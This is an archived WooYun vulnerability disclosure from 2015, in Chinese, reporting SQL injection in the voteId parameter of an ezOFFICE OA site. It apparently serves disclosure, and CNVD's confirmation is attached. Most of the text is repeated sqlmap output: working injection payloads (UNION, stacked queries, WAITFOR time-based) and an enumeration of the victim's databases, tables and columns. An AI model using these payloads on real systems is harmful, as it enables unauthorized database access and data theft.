乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-24: 细节已通知厂商并且等待厂商处理中 2015-09-28: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-08: 细节向核心白帽子及相关领域专家公开 2015-10-18: 细节向普通白帽子公开 2015-10-28: 细节向实习白帽子公开 2015-11-12: 细节向公众公开
oa全泄露
http://**.**.**.**/voteDisp.jsp?voteId=15参数voteid存在注射
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:---Parameter: voteId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: voteId=15 AND 2576=2576 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: voteId=15; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: voteId=15 WAITFOR DELAY '0:0:5'-----web application technology: JSPback-end DBMS: Microsoft SQL Server 2005sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: voteId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: voteId=15 AND 2576=2576 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: voteId=15; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: voteId=15 WAITFOR DELAY '0:0:5'-----web application technology: JSPback-end DBMS: Microsoft SQL Server 2005available databases [5]:[*] ahsft[*] master[*] model[*] msdb[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: voteId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: voteId=15 AND 2576=2576 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: voteId=15; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: voteId=15 WAITFOR DELAY '0:0:5'-----web application technology: JSPback-end DBMS: Microsoft SQL Server 2005Database: ahsft+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| ezoffice.CMS_SITE_STATISTIC | 67432669 || ezoffice.CMS_ARTICLE_STATISTIC | 27499461 || ezoffice.CMS_CHANNEL_STATISTIC | 14555288 || ezoffice.CMS_OPERATION_LOG | 383292 || ezoffice.CMS_ARTICLE | 146852 || ezoffice.CMS_ARTI_CONTENT | 140478 || ezoffice.CMS_ARTI_OPERATION | 100274 || ezoffice.SFT_XXBS_SYXX | 98482 || ezoffice.SFT_XXBS_WDXX | 95361 || ezoffice.SECURITY_LOG | 58471 || dbo.BS_XMLFROMBEAN | 48079 || ezoffice.OA_ALLATTACH | 21779 || ezoffice.CMS_SYSTEM_LOG | 18070 || ezoffice.WF_PROCEEDREADWRITECONTROL | 17761 || ezoffice.CMS_ARTI_VERSION | 17757 || ezoffice.CMS_FILES | 14231 || ezoffice.OA_INFORMATIONBROWSER | 8461 || ezoffice.ORG_RIGHTSCOPE | 5972 || ezoffice.SFT_XXBS_KWXX | 5478 || ezoffice.ORG_SYNCRTX | 4999 || ezoffice.OA_INFORMATION | 3669 || ezoffice.CMS_MESSAGE | 3539 || ezoffice.CMS_MESSAGE_REPLY | 3450 || ezoffice.ORG_USER_ROLE | 2971 || ezoffice.ORG_EMPLOYEE | 2891 || ezoffice.ORG_ORGANIZATION_USER | 2887 || ezoffice.OA_DISTRICT | 2476 || ezoffice.WF_PROCEEDTRANSITION | 2366 || ezoffice.CMS_TMPL_CITATION | 2077 || ezoffice.WF_PROCEEDTR | 2060 || ezoffice.SFT_XXBS_DW | 1985 || ezoffice.roles | 1838 || ezoffice.CMS_VOTE_PERSON | 1562 || ezoffice.WF_PROCEEDACTIVITY | 1532 || ezoffice.CMS_MESSAGE_MASTER | 1446 || dbo.oldid | 1360 || ezoffice.CMS_TEMPLATES_FILES | 1213 || ezoffice.CMS_TMPL_FILE_OPERATION | 1203 || ezoffice.CMS_ARTI_CHANNEL | 978 || ezoffice.CMS_INTERVIEW_INFO | 793 || ezoffice.WF_DEALWITHLOG | 785 || ezoffice.CMS_CONFIG | 679 || ezoffice.SFT_XXBS_KW | 626 || ezoffice.WF_READWRITECONTROL | 619 || ezoffice.Document_File | 468 || ezoffice.Document | 466 || ezoffice.WF_WORK | 443 || ezoffice.OA_INFORORGSTAT | 438 || ezoffice.SECURITY_ONLINEUSER | 422 || ezoffice.OA_INFORPERSONALSTAT | 364 || ezoffice.wf_proceedflow | 321 || ezoffice.OA_INFORMATIONHISTORY | 319 || ezoffice.WF_DEALWITHCOMMENT | 286 || ezoffice.CMS_USERPOWER | 277 || ezoffice.WF_DEALWITH | 263 || ezoffice.ah_xxflbackup | 221 || ezoffice.OA_INFORMATIONACCESSORY | 221 || ezoffice.SFT_XXBS_XXCY | 210 || ezoffice.OA_MAIL_USER | 209 || ezoffice.WF_IMMOBILITYFIELD | 205 || ezoffice.ORG_ORGANIZATION | 187 || ezoffice.ORG_ROLE_RIGHT | 177 || ezoffice.CMS_SYNCH_OA_ARTICLE | 152 || ezoffice.CMS_QUES_PERSON | 140 || ezoffice.OA_MAILINTERIOR | 140 || ezoffice.CMS_AHSFT_SYNCHARTICLE_RECORD | 136 || ezoffice.OA_LINKMAN | 124 || ezoffice.ORG_RIGHT | 123 || ezoffice.SFT_XXBS_CXXX | 123 || ezoffice.CMS_PAGE | 105 || ezoffice.WF_TRANSITIONRESTRICTION | 100 || ezoffice.WF_TRANSITION | 96 || ezoffice.CMS_MODULE_OPERATION | 87 || dbo.aqsfj | 82 || dbo.hfsfj | 76 || ezoffice.Template_BookMarks | 74 || ezoffice.WF_ACTIVITY | 73 || ezoffice.CMS_INTERVIEW_GUEST | 72 || dbo.chuzsfj | 70 || dbo.fysfj | 70 || ezoffice.OA_INFORHISTORYACCESSORY | 67 || dbo.hssfj | 66 || dbo.xcsfj | 65 || dbo.szsfj | 59 || ezoffice.OA_ORGWRAP | 59 || ezoffice.ORG_ROLE | 59 || ezoffice.CMS_VOTE_ITEM | 58 || ezoffice.OA_CUSTMENU | 57 || ezoffice.OA_MENUSET | 57 || ezoffice.OA_INFORMATIONCHANNEL | 54 || dbo.czsfj | 48 || dbo.bbsfj | 47 || dbo.bzsfj | 47 || ezoffice.OA_FORUM | 46 || ezoffice.GOV_senddocumentTopical | 43 || dbo.chsfj | 42 || ezoffice.tShow | 40 || dbo.jb_message | 39 || dbo.whsfj | 39 || ezoffice.WF_WORKFLOWWRITECONTROL | 38 || dbo.Sheet1$ | 34 || ezoffice.CMS_ADVERT | 33 || ezoffice.SFT_XXBS_JFBZ | 31 || ezoffice.CMS_ADVERT_PLACE | 30 || ezoffice.OA_MAILACCESSORY | 30 || ezoffice.CMS_ARTI_LINKS | 26 || ezoffice.CUSTOMER_CENTER | 26 || dbo.cms_dxtj | 25 || ezoffice.SECURITY_LOG_MODULE | 25 || dbo.hbsfj | 24 || ezoffice.CMS_INFO_APPLY | 24 || ezoffice.CMS_QUES_ITEM | 24 || ezoffice.OA_PERSONALSTAT | 24 || ezoffice.OA_WORKLOG | 24 || ezoffice.OA_EVENTATTENDER | 23 || ezoffice.tElt | 23 || ezoffice.tField | 23 || ezoffice.WF_GRAPH_UNIT | 23 || ezoffice.oa_patchinfo | 22 || ezoffice.OA_DUTY | 20 || ezoffice.WF_PACKAGE | 20 || ezoffice.CMS_SITE | 19 || ezoffice.tSign | 19 || ezoffice.GOV_DOCUMENTSENDFILE | 18 || ezoffice.WF_NEEDFLOWMODULE | 18 || ezoffice.oa_boardroom_meetingtime | 17 || ezoffice.OA_BOARDROOMAPPLY | 17 || ezoffice.WF_IMMOBILITYFORM | 17 || ezoffice.CMS_ARTI_STATE | 16 || ezoffice.CMS_INTERVIEW | 15 || ezoffice.OA_DIARYCLASS | 15 || ezoffice.OA_EVENT | 15 || ezoffice.CMS_ROLE | 14 || ezoffice.OA_OFFICALDICTION | 14 || ezoffice.WF_WORKFLOWPROCESS | 14 || ezoffice.CMS_VOTE | 13 || ezoffice.gov_senddocumentword | 13 || ezoffice.MS_COUNT | 13 || ezoffice.CMS_ARTI_SOURCE | 12 || ezoffice.gov_senddocumentNum | 12 || ezoffice.OA_DIARY | 12 || ezoffice.Tmp | 12 || ezoffice.OA_INFORMATIONCOMMENT | 11 || ezoffice.GOV_senddocumentUpdate | 10 || ezoffice.GOV_SENDFILE_USER | 10 || ezoffice.OA_NETSURVEYVOTE | 10 || ezoffice.OA_SOUNDREMIND | 10 || ezoffice.CMS_TEMPLATES | 9 || ezoffice.OA_NOTEBOOK | 9 || ezoffice.tAreatype | 9 || ezoffice.Template_File | 9 || ezoffice.CMS_QUES_TOPIC | 8 || ezoffice.CMS_SYNCH_INFOPUBLIC_CHANNEL | 8 || ezoffice.CMS_SYNCH_OA_CHANNEL | 8 || ezoffice.MS_MODEL | 8 || ezoffice.OA_NETADDRESS | 8 || ezoffice.OA_NETADDRESSCLASS | 8 || ezoffice.SFT_XXBS_KWQS | 8 || ezoffice.CMS_MESSAGECATEGORY | 7 || ezoffice.CMS_MODULE | 7 || ezoffice.kill_kk | 7 || ezoffice.OA_BOARDROOM | 7 || ezoffice.SFT_XXBS_UNION | 7 || ezoffice.CMS_ARTI_KEYWORD | 6 || ezoffice.CMS_QUES_TEXT | 6 || ezoffice.GOV_SENDFILEBROWSER | 6 || ezoffice.GOV_SENDFILECHECKWITHWORKFLOW | 6 || ezoffice.OA_SOUNDSET | 6 || ezoffice.OA_WORKREPORTLEADER | 6 || ezoffice.OA_DEPARTMENTSTYLE | 5 || ezoffice.OA_LINKMANCLASS | 5 || ezoffice.OA_WORKREPORT | 5 || ezoffice.ORG_USER_GROUP | 5 || ezoffice.CMS_QUESTIONNAIRE | 4 || ezoffice.OA_BDROOMAPPACCESSORY | 4 || ezoffice.OA_FORUMCLASS | 4 || ezoffice.OA_MAILUSERBOX | 4 || ezoffice.oa_maturity_alert_settings | 4 || ezoffice.OA_NETSURVEYITEM | 4 || ezoffice.tType | 4 || dbo.BookMarks | 3 || ezoffice.ah_roles | 3 || ezoffice.ah_xxcheck | 3 || ezoffice.CMS_VERSION | 3 || ezoffice.OA_ASSOCIATEINFO | 3 || ezoffice.OA_BDROOMAPPTYPE | 3 || ezoffice.OA_EDITION | 3 || ezoffice.OA_TASK | 3 || ezoffice.OA_TASKEXEC | 3 || ezoffice.tModel | 3 || ezoffice.tSession | 3 || ezoffice.ah_xxdh | 2 || ezoffice.CMS_IP_LIMIT | 2 || ezoffice.CMS_IPS | 2 || ezoffice.GOV_RECEIVEFILE | 2 || ezoffice.GOV_senddocumentBASEINFO | 2 || ezoffice.MS_INFODESCRIBE | 2 || ezoffice.OA_NETDISK_FILE | 2 || ezoffice.OA_RELATIONOBJECT | 2 || ezoffice.OA_WORKREPORTPOSTIL | 2 || ezoffice.tArea | 2 || ezoffice.tCode | 2 || ezoffice.tSeq | 2 || ezoffice.tTable | 2 || ezoffice.ah_fwl | 1 || ezoffice.CMS_APPLYFLOW_INFO | 1 || ezoffice.CMS_ARTI_CHANNEL_SQL | 1 || ezoffice.CMS_ARTI_TYPE | 1 || ezoffice.CMS_SEQ | 1 || ezoffice.D99_REG | 1 || ezoffice.Document_Signature | 1 || ezoffice.foofoofoo | 1 || ezoffice.GJ_GOODS | 1 || ezoffice.GJ_GOODSTYPE | 1 || ezoffice.GJ_STOCK | 1 || ezoffice.GJ_STOCK_GOODSTYPE | 1 || ezoffice.GOV_documentUnit | 1 || ezoffice.gov_ReceiveFileSeq | 1 || ezoffice.gov_senddocumentseq | 1 || ezoffice.GOV_SENDFILENOBROWSER | 1 || ezoffice.gov_wflowResave | 1 || ezoffice.OA_ARCHIVESCLASS | 1 || ezoffice.OA_ARCHIVESDOSSIER | 1 || ezoffice.OA_CUSTOMDESKTOPLAYOUT | 1 || ezoffice.OA_FESTIVALSET | 1 || ezoffice.OA_NETSURVEY | 1 || ezoffice.OA_SEQ | 1 || ezoffice.OA_UNITINFO | 1 || ezoffice.ORG_DOMAIN | 1 || ezoffice.ORG_GROUP | 1 || ezoffice.ORG_MANAGER | 1 || ezoffice.SECURITY_IP | 1 || ezoffice.TABLERELATION | 1 || ezoffice.tLimit | 1 || ezoffice.tPage | 1 || ezoffice.WF_WORKFLOWCHANNEL | 1 || ezoffice.WF_WORKFLOWSTOCK | 1 |+----------------------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: voteId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: voteId=15 AND 2576=2576 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: voteId=15; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: voteId=15 WAITFOR DELAY '0:0:5'-----web application technology: JSPback-end DBMS: Microsoft SQL Server 2005Database: ahsftTable: ezoffice.CMS_SITE_STATISTIC[5 columns]+----------------+----------+| Column | Type |+----------------+----------+| INTERVIEW_DATE | datetime || INTERVIEW_IP | varchar || SITE_ID | numeric || STATISTIC_ID | numeric || STATISTIC_TYPE | numeric |+----------------+----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: voteId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: voteId=15 AND 2576=2576 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: voteId=15; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: voteId=15 WAITFOR DELAY '0:0:5'-----web application technology: JSPback-end DBMS: Microsoft SQL Server 2005Database: ahsftTable: ezoffice.CMS_ARTICLE[41 columns]+-----------------------+----------+| Column | Type |+-----------------------+----------+| ARTI_ACCESSORY_IDS | varchar || ARTI_AUTHOR | varchar || ARTI_CODE | varchar || ARTI_CREATED_TIME | datetime || ARTI_CREATOR_ID | varchar || ARTI_CREATOR_ORGID | varchar || ARTI_DELETEFLAG | numeric || ARTI_EDIT_TIME | datetime || ARTI_EDITOR | varchar || ARTI_END_TIME | datetime || ARTI_FWWH | varchar || ARTI_KEYWORD | varchar || ARTI_LINK | varchar || ARTI_LINK_IDS | varchar || ARTI_MAPPING | numeric || ARTI_PHOTO_IDS | varchar || ARTI_PRESENTATION | varchar || ARTI_RELA_ARTICLE | numeric || ARTI_RELA_ARTICLE_ID | varchar || ARTI_RELA_ARTICLE_SQL | varchar || ARTI_SHORTTITLE | varchar || ARTI_SHORTTITLE_STYLE | varchar || ARTI_SOURCE | varchar || ARTI_START_TIME | datetime || ARTI_SYMBOL_PHOTO_IDS | varchar || ARTI_TITLE | varchar || ARTI_VERSION | varchar || ARTICLE_ID | numeric || ARTICLE_MAPPING_ID | numeric || ARTICLE_STATE_ID | numeric || ARTICLE_TYPE_ID | numeric || CHANNEL_ID | numeric || DOMAIN_ID | numeric || LOOK_CNT | numeric || NEEDTIME_CTRL | numeric || RECOMMEND_FLAG | numeric || SETTOP_FLAG | numeric || SITE_ID | numeric || STR1 | varchar || STR2 | varchar || STR3 | varchar |+-----------------------+----------+
跑了很多就会无法访问 应该有墙。。ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品。oa里面的数据全部泄露啦啦啦啦 什么都没动。。别查水表
中秋节了。。。兑换的月饼不会过完年才收到吧
危害等级:高
漏洞Rank:11
确认时间:2015-09-28 19:16
CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置。
暂无
